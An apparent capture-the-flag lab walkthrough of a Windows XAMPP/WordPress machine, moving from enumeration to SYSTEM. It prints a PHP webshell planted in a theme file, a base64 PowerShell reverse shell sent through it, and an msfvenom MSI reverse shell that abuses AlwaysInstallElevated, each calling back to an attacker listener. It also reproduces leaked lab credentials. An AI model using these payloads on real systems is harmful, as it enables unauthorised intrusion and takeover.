We start off with a basic nmap scan of the target (my output below is condensed)
┌──(root㉿user)-[/home/user]
└─# nmap -p- -Pn $target -v -T5 --min-rate 1500 --max-rtt-timeout 500ms --max-retries 3 --open -oN nmap.txt && nmap -Pn $target -sVC -v && nmap $target -v --script vuln
<SNIP>
PORT STATE SERVICE VERSION
21/tcp open ftp FileZilla ftpd 0.9.41 beta
| ftp-syst:
|_ SYST: UNIX emulated by FileZilla
80/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-favicon: Unknown favicon MD5: 56F7C04657931F2D0B79371B2D6E9820
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.205.55/dashboard/
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| tls-alpn:
|_ http/1.1
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| ssl-cert: Subject: commonName=localhost
| Issuer: commonName=localhost
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2009-11-10T23:48:47
| Not valid after: 2019-11-08T23:48:47
| MD5: a0a4:4cc9:9e84:b26f:9e63:9f9e:d229:dee0
|_SHA-1: b023:8c54:7a90:5bfa:119c:4e8b:acca:eacf:3649:1ff6
|_ssl-date: TLS randomness does not represent time
|_http-favicon: Unknown favicon MD5: 6EB4A43CB64C97F76562AF703893C8FD
| http-title: Welcome to XAMPP
|_Requested resource was https://192.168.205.55/dashboard/
445/tcp open microsoft-ds?
3306/tcp open mysql MariaDB 10.3.24 or later (unauthorized)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsI followed this up instantly with dirsearch to probe this /dashboard endpoint:
┌──(root㉿user)-[/home/user]
└─# dirsearch -u 192.168.205.55/dashboard -x 403
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/user/reports/_192.168.205.55/_dashboard_26-04-30_06-34-40.txt
Target: https://192.168.205.55/
[06:34:40] Starting: dashboard/
[06:34:49] 200 - 4KB - /dashboard/404.html
[06:35:20] 301 - 349B - /dashboard/de -> https://192.168.205.55/dashboard/de/
[06:35:21] 301 - 351B - /dashboard/docs -> https://192.168.205.55/dashboard/docs/
[06:35:21] 200 - 14KB - /dashboard/docs/
[06:35:23] 301 - 349B - /dashboard/es -> https://192.168.205.55/dashboard/es/
[06:35:24] 200 - 31KB - /dashboard/faq.html
[06:35:24] 200 - 1KB - /dashboard/favicon.ico
[06:35:26] 301 - 349B - /dashboard/fr -> https://192.168.205.55/dashboard/fr/
[06:35:29] 200 - 7KB - /dashboard/images/
[06:35:29] 301 - 353B - /dashboard/images -> https://192.168.205.55/dashboard/images/
[06:35:32] 301 - 349B - /dashboard/it -> https://192.168.205.55/dashboard/it/
[06:35:45] 200 - 82KB - /dashboard/phpinfo.php
[06:35:58] 301 - 349B - /dashboard/pl -> https://192.168.205.55/dashboard/pl/
[06:36:04] 301 - 349B - /dashboard/ru -> https://192.168.205.55/dashboard/ru/Port 21: FTP - I attempted to brute force this using common username / password combinations to no avail.
Port 80: Website
This is the default XAMPP landing page. It confirms that we've hit a classic "out-of-the-box" XAMPP installation on Windows. I attempted probing the directories further with exhaustive ffuf syntax (this scan started when I began the box and it was still going over an hour later):
┌──(root㉿user)-[/home/user/Downloads]
└─# ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt -u http://$target/FUZZ -recursion -recursion-depth 5 -e .php,.php3,.php4,.php5,.phtml,.phar,.html,.htm,.inc,.tpl,.htaccess,.htpasswd,.conf,.config,.log,.sql,.bak,.old,.swp,~,.zip,.tar,.gz,.tgz,.7z,.rar,.sh,.py,.pl,.cgi,.rb,.lua,.js,.json,.xml,.wsdl,.txt,.pdf,.dist,.example,.local,.env,.git,.htaccess.bak
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://192.168.205.55/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt
:: Extensions : .php .php3 .php4 .php5 .phtml .phar .html .htm .inc .tpl .htaccess .htpasswd .conf .config .log .sql .bak .old .swp ~ .zip .tar .gz .tgz .7z .rar .sh .py .pl .cgi .rb .lua .js .json .xml .wsdl .txt .pdf .dist .example .local .env .git .htaccess.bak
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
img [Status: 301, Size: 338, Words: 22, Lines: 10, Duration: 24ms]
[INFO] Adding a new job to the queue: http://192.168.205.55/img/FUZZ
webalizer [Status: 403, Size: 1046, Words: 102, Lines: 43, Duration: 38ms]
index.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 25ms]
phpmyadmin [Status: 403, Size: 1205, Words: 127, Lines: 46, Duration: 39ms]
dashboard [Status: 301, Size: 344, Words: 22, Lines: 10, Duration: 25ms]
[INFO] Adding a new job to the queue: http://192.168.205.55/dashboard/FUZZ
applications.html [Status: 200, Size: 3607, Words: 770, Lines: 80, Duration: 33ms]
IMG [Status: 301, Size: 338, Words: 22, Lines: 10, Duration: 24ms]
[INFO] Adding a new job to the queue: http://192.168.205.55/IMG/FUZZ
Img [Status: 301, Size: 338, Words: 22, Lines: 10, Duration: 22ms]
[INFO] Adding a new job to the queue: http://192.168.205.55/Img/FUZZ
Applications.html [Status: 200, Size: 3607, Words: 770, Lines: 80, Duration: 25ms]
xampp [Status: 301, Size: 340, Words: 22, Lines: 10, Duration: 35ms]
[INFO] Adding a new job to the queue: http://192.168.205.55/xampp/FUZZ
<SNIP>
entering interactive mode
type "help" for a list of commands, or ENTER to resume.
> afw 102
[INFO] New word count filter value set
>
[INFO] ------ RESUMING -----
Webalizer [Status: 301, Size: 344, Words: 22, Lines: 10, Duration: 34ms]
[INFO] Adding a new job to the queue: http://192.168.205.55/Webalizer/FUZZ
[INFO] Starting queued job on target: http://192.168.205.55/img/FUZZ
[INFO] Starting queued job on target: http://192.168.205.55/dashboard/FUZZ
images [Status: 301, Size: 351, Words: 22, Lines: 10, Duration: 23ms]
[INFO] Adding a new job to the queue: http://192.168.205.55/dashboard/images/FUZZ
docs [Status: 301, Size: 349, Words: 22, Lines: 10, Duration: 27ms]
[INFO] Adding a new job to the queue: http://192.168.205.55/dashboard/docs/FUZZ
de [Status: 301, Size: 347, Words: 22, Lines: 10, Duration: 21ms]
[INFO] Adding a new job to the queue: http://192.168.205.55/dashboard/de/FUZZ
fr [Status: 301, Size: 347, Words: 22, Lines: 10, Duration: 26ms]
[INFO] Adding a new job to the queue: http://192.168.205.55/dashboard/fr/FUZZ
es [Status: 301, Size: 347, Words: 22, Lines: 10, Duration: 23ms]
[INFO] Adding a new job to the queue: http://192.168.205.55/dashboard/es/FUZZ
404.html [Status: 200, Size: 4384, Words: 915, Lines: 122, Duration: 24ms]
Images [Status: 301, Size: 351, Words: 22, Lines: 10, Duration: 23ms]
[INFO] Adding a new job to the queue: http://192.168.205.55/dashboard/Images/FUZZ
ru [Status: 301, Size: 347, Words: 22, Lines: 10, Duration: 24ms]
[INFO] Adding a new job to the queue: http://192.168.205.55/dashboard/ru/FUZZ
it [Status: 301, Size: 347, Words: 22, Lines: 10, Duration: 33ms]
[INFO] Adding a new job to the queue: http://192.168.205.55/dashboard/it/FUZZ
index.html [Status: 200, Size: 7576, Words: 1305, Lines: 168, Duration: 29ms]
pl [Status: 301, Size: 347, Words: 22, Lines: 10, Duration: 24ms]
[INFO] Adding a new job to the queue: http://192.168.205.55/dashboard/pl/FUZZ
javascripts [Status: 301, Size: 356, Words: 22, Lines: 10, Duration: 31ms]
[INFO] Adding a new job to the queue: http://192.168.205.55/dashboard/javascripts/FUZZ
stylesheets [Status: 301, Size: 356, Words: 22, Lines: 10, Duration: 39ms]
[INFO] Adding a new job to the queue: http://192.168.205.55/dashboard/stylesheets/FUZZ
faq.html [Status: 200, Size: 31751, Words: 6614, Lines: 524, Duration: 24ms]
ro [Status: 301, Size: 347, Words: 22, Lines: 10, Duration: 23ms]
[INFO] Adding a new job to the queue: http://192.168.205.55/dashboard/ro/FUZZ
tr [Status: 301, Size: 347, Words: 22, Lines: 10, Duration: 27ms]
[INFO] Adding a new job to the queue: http://192.168.205.55/dashboard/tr/FUZZ
hu [Status: 301, Size: 347, Words: 22, Lines: 10, Duration: 34ms]
[INFO] Adding a new job to the queue: http://192.168.205.55/dashboard/hu/FUZZ
jp [Status: 301, Size: 347, Words: 22, Lines: 10, Duration: 33ms]
[INFO] Adding a new job to the queue: http://192.168.205.55/dashboard/jp/FUZZ
Docs [Status: 301, Size: 349, Words: 22, Lines: 10, Duration: 32ms]
[INFO] Adding a new job to the queue: http://192.168.205.55/dashboard/Docs/FUZZ
DE [Status: 301, Size: 347, Words: 22, Lines: 10, Duration: 36ms]
[INFO] Adding a new job to the queue: http://192.168.205.55/dashboard/DE/FUZZ
IMAGES [Status: 301, Size: 351, Words: 22, Lines: 10, Duration: 33ms]
[INFO] Adding a new job to the queue: http://192.168.205.55/dashboard/IMAGES/FUZZ
IT [Status: 301, Size: 347, Words: 22, Lines: 10, Duration: 30ms]
[INFO] Adding a new job to the queue: http://192.168.205.55/dashboard/IT/FUZZ
FR [Status: 301, Size: 347, Words: 22, Lines: 10, Duration: 30ms]
[INFO] Adding a new job to the queue: http://192.168.205.55/dashboard/FR/FUZZ
ES [Status: 301, Size: 347, Words: 22, Lines: 10, Duration: 35ms]
[INFO] Adding a new job to the queue: http://192.168.205.55/dashboard/ES/FUZZ
FAQ.html [Status: 200, Size: 31751, Words: 6614, Lines: 524, Duration: 22ms]
howto.html [Status: 200, Size: 6021, Words: 942, Lines: 132, Duration: 27ms]
StyleSheets [Status: 301, Size: 356, Words: 22, Lines: 10, Duration: 30ms]
[INFO] Adding a new job to the queue: http://192.168.205.55/dashboard/StyleSheets/FUZZ
ur [Status: 301, Size: 347, Words: 22, Lines: 10, Duration: 21ms]
[INFO] Adding a new job to the queue: http://192.168.205.55/dashboard/ur/FUZZ
The only interesting endpoint as this point was /phpinfo
This endpoint gives us a username. Obviously in the information gathering stages this could be very useful.
Port 445: SMB
I noted that there was a guest account enabled on the target and there was a particularly interesting share (Shenzi) that our user had read access to:
┌──(root㉿user)-[/home/user]
└─# nxc smb $target -u 'guest' -p '' --shares
SMB 192.168.205.55 445 SHENZI [*] Windows 10 / Server 2019 Build 19041 x64 (name:SHENZI) (domain:shenzi) (signing:False) (SMBv1:False)
SMB 192.168.205.55 445 SHENZI [+] shenzi\guest:
SMB 192.168.205.55 445 SHENZI [*] Enumerated shares
SMB 192.168.205.55 445 SHENZI Share Permissions Remark
SMB 192.168.205.55 445 SHENZI ----- ----------- ------
SMB 192.168.205.55 445 SHENZI IPC$ READ Remote IPC
SMB 192.168.205.55 445 SHENZI Shenzi READ
┌──(root㉿user)-[/home/user]
└─# cat /root/.nxc/modules/nxc_spider_plus/192.168.205.55.json
{
"Shenzi": {
"passwords.txt": {
"atime_epoch": "2020-05-29 14:26:15",
"ctime_epoch": "2020-05-27 20:12:05",
"mtime_epoch": "2020-05-29 14:26:51",
"size": "894 B"
},
"readme_en.txt": {
"atime_epoch": "2020-05-29 14:26:15",
"ctime_epoch": "2020-05-18 07:55:45",
"mtime_epoch": "2020-05-29 14:26:51",
"size": "7.19 KB"
},
"sess_klk75u2q4rpgfjs3785h6hpipp": {
"atime_epoch": "2020-05-28 16:45:09",
"ctime_epoch": "2020-05-27 17:48:21",
"mtime_epoch": "2020-05-29 14:26:51",
"size": "3.79 KB"
},
"why.tmp": {
"atime_epoch": "2020-05-28 16:45:09",
"ctime_epoch": "2013-03-30 12:28:59",
"mtime_epoch": "2020-05-29 14:26:51",
"size": "213 B"
},
"xampp-control.ini": {
"atime_epoch": "2020-05-28 16:45:09",
"ctime_epoch": "2020-05-25 19:31:49",
"mtime_epoch": "2020-05-29 14:26:51",
"size": "178 B"
}
}
}I used the following command to grab the entire Shenzi share:
smbget -R smb://$target/Shenzi -nNow comes the tedious part. Examining the information therein:
passwords.txt
┌──(root㉿user)-[/run/…/user/2024/HTBox/shenzi]
└─# cat passwords.txt
### XAMPP Default Passwords ###
1) MySQL (phpMyAdmin):
User: root
Password:
(means no password!)
2) FileZilla FTP:
[ You have to create a new user on the FileZilla Interface ]
3) Mercury (not in the USB & lite version):
Postmaster: Postmaster (postmaster@localhost)
Administrator: Admin (admin@localhost)
User: newuser
Password: wampp
4) WEBDAV:
User: xampp-dav-unsecure
Password: ppmax2011
Attention: WEBDAV is not active since XAMPP Version 1.7.4.
For activation please comment out the httpd-dav.conf and
following modules in the httpd.conf
LoadModule dav_module modules/mod_dav.so
LoadModule dav_fs_module modules/mod_dav_fs.so
Please do not forget to refresh the WEBDAV authentification (users and passwords).
5) WordPress:
User: admin
Password: FeltHeadwallWight35As you will note from the nmap scan above: mysql was open. I tried to attain a connection using root as the user (leaving the password blank) but the server (as suspected) was not configured to accept connections outside of the local host.
The password that seemed 'unique' was the one listed against the WP installation BUT: where is the wordpress instance ?
This is where offsec differ greatly from HackTheBox and I would say that if you are like me and you have trained solely on HTB boxes for well over a year; the methodology changes BIG TIME with user enumeration and initial access. With a HTB machine you would likely find the WP installation by fuzzing the directories but here ….. the wp installation was to be found at /shenzi
There are tools like wpscan you can use to enumerate wordpress but as I already have a login for the admin user; I just went straight to the login page /shenzi/wp-login.php and used the credentials to login.
CPTS has a module for hacking Wordpress, Joomla and many more; my next moves were based on my notes from those modules — here.
Once logged in as admin you are going to want to select Appearance > Theme Editor > click your theme and then on the right select a page to edit any page that ends in .php.
I added the following line of code (at line 9 — below) to 404.php
system($_GET[0]);
Once saved. You have placed a php webshell inside the contents of the file which can be executed via the following syntax: - note: the theme here is twentytwenty so the path will not always be the same !
┌──(root㉿user)-[/run/…/user/2024/HTBox/shenzi]
└─# curl "http://192.168.205.55/shenzi/wp-content/themes/twentytwenty/404.php?0=dir"
Volume in drive C has no label.
Volume Serial Number is E24B-9BB9
Directory of C:\xampp\htdocs\shenzi\wp-content\themes\twentytwenty
05/28/2020 09:03 AM <DIR> .
05/28/2020 09:03 AM <DIR> ..
05/28/2020 09:03 AM 269 .stylelintrc.json
04/29/2026 04:20 PM 856 404.php
05/28/2020 09:03 AM <DIR> assets
05/28/2020 09:03 AM <DIR> classes
05/28/2020 09:03 AM 3,218 comments.phpYou can see the above command gives us a directory listing on the target when we use dir. With this established, we can proceed to obtain an interactive shell on the target.
I went over to revshells and grabbed a base64 encoded Powershell Reverse shell (URL ENCODED):
┌──(root㉿user)-[/run/…/user/2024/HTBox/shenzi]
└─# curl "http://192.168.205.55/shenzi/wp-content/themes/twentytwenty/404.php?0=powershell%20-e%20JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADQANQAuADIAMAA4ACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA%3D%3D"This was successful and I obtained a reverse shell as the user shenzi.
Privilege Escalation
My windows privilege escalation methodology is to check whoami /priv (list privileges) and run PowerUp.ps1.
Here, we got somewhat lucky, the script revealed a 'golden ticket'; AlwaysInstallElevated registry key is enabled for our user. This is a misconfiguration that tells the Windows Installer to run any MSI package with full NT AUTHORITY\SYSTEM privileges, regardless of the user's actual permissions.
The Write-UserAddMSI function exploits this by generating a malicious MSI file that, when executed, automatically creates a new local administrator account on the system.
I have included my payload log below from PowerUp.ps1:
PS C:\Users\shenzi\DEsktop> Import-Module ./PowerUp.ps1
PS C:\Users\shenzi\DEsktop> Invoke-allChecks
ServiceName : edgeupdate
Path : "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc
ModifiableFile : C:\
ModifiableFilePermissions : AppendData/AddSubdirectory
ModifiableFileIdentityReference : NT AUTHORITY\Authenticated Users
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'edgeupdate'
CanRestart : False
Name : edgeupdate
Check : Modifiable Service Files
ServiceName : edgeupdate
Path : "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc
ModifiableFile : C:\
ModifiableFilePermissions : {Delete, GenericWrite, GenericExecute, GenericRead}
ModifiableFileIdentityReference : NT AUTHORITY\Authenticated Users
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'edgeupdate'
CanRestart : False
Name : edgeupdate
Check : Modifiable Service Files
ServiceName : edgeupdatem
Path : "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /medsvc
ModifiableFile : C:\
ModifiableFilePermissions : AppendData/AddSubdirectory
ModifiableFileIdentityReference : NT AUTHORITY\Authenticated Users
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'edgeupdatem'
CanRestart : False
Name : edgeupdatem
Check : Modifiable Service Files
ServiceName : edgeupdatem
Path : "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /medsvc
ModifiableFile : C:\
ModifiableFilePermissions : {Delete, GenericWrite, GenericExecute, GenericRead}
ModifiableFileIdentityReference : NT AUTHORITY\Authenticated Users
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'edgeupdatem'
CanRestart : False
Name : edgeupdatem
Check : Modifiable Service Files
ModifiablePath : C:\Users\shenzi\AppData\Local\Microsoft\WindowsApps
IdentityReference : SHENZI\shenzi
Permissions : {WriteOwner, Delete, WriteAttributes, Synchronize...}
%PATH% : C:\Users\shenzi\AppData\Local\Microsoft\WindowsApps
Name : C:\Users\shenzi\AppData\Local\Microsoft\WindowsApps
Check : %PATH% .dll Hijacks
AbuseFunction : Write-HijackDll -DllPath 'C:\Users\shenzi\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll'
Check : AlwaysInstallElevated Registry Key
AbuseFunction : Write-UserAddMSI
DefaultDomainName : SHENZI
DefaultUserName : shenzi
DefaultPassword :
AltDefaultDomainName :
AltDefaultUserName :
AltDefaultPassword :
Check : Registry Autologons
I used the following manual checks to confirm that the Registry keys were enabled for this attack (both commands have to return 0x1)
PS C:\Users\shenzi\DEsktop> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer
AlwaysInstallElevated REG_DWORD 0x1
PS C:\Users\shenzi\DEsktop> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
AlwaysInstallElevated REG_DWORD 0x1I then ran systeminfo on the target to double check the architecture before producing a payload in msfvenom for the creation of our malicious reverse.msi package:
PS C:\Users\shenzi\DEsktop> systeminfo
Host Name: SHENZI
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.19042 N/A Build 19042
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: admin
Registered Organization:
Product ID: 00331-10000-00001-AA088
Original Install Date: 12/3/2021, 8:19:53 AM
System Boot Time: 8/2/2024, 1:10:20 PM
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
The above output confirms that we are dealing with a x64 architecture on the target. I ran the following payload with msfvenom and transferred this executable onto the target machine ready for deployment:
┌──(root㉿user)-[/tmp]
└─# msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.208 LPORT=4444 -f msi -o reverse.msi
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of msi file: 159744 bytes
Saved as: reverse.msiI then setup my listener on kali (port 4444) and executed the malicious reverse.msi package to recieve a connection back as nt authority\system:
PS C:\Users\shenzi\DEsktop> dir
Directory: C:\Users\shenzi\DEsktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/29/2026 3:29 PM 34 local.txt
-a---- 4/29/2026 4:38 PM 600580 PowerUp.ps1
-a---- 4/29/2026 4:47 PM 159744 reverse.msi
PS C:\Users\shenzi\DEsktop> msiexec /quiet /qn /i C:\Users\shenzi\Desktop\reverse.msi
┌──(root㉿user)-[/tmp]
└─# rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.45.208] from (UNKNOWN) [192.168.205.55] 59939
Microsoft Windows [Version 10.0.19042.1526]
(c) Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>id
id
'id' is not recognized as an internal or external command,
operable program or batch file.
C:\WINDOWS\system32>whoami
whoami
nt authority\system